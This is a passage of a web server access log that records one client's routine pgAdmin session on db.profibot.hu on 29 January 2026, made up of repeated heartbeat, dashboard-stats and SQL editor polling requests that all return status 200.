Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:47:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:47:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:48:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:48:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:49:48 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:49:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:49:49 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:49:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:49:51 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:49:53 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:49:54 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:49:55 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:49:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:49:57 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:49:59 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:50:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:01 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:50:03 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:50:05 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:50:05 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:07 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:50:07 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:50:07 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 317] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:50:07 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:50:09 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:50:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:11 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:50:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:50:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:51:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:51:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:51:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:51:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:51:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:51:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:51:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:52:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:52:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:53:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:53:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:54:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:54:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:55:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:55:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:56:26 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:56:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:56:26 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:56:26 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:56:28 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:56:29 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:56:30 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:56:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:56:32 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:56:32 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 362] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:56:32 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:56:32 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:56:34 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:56:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:56:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:56:36 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:56:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:56:46 +0000] - 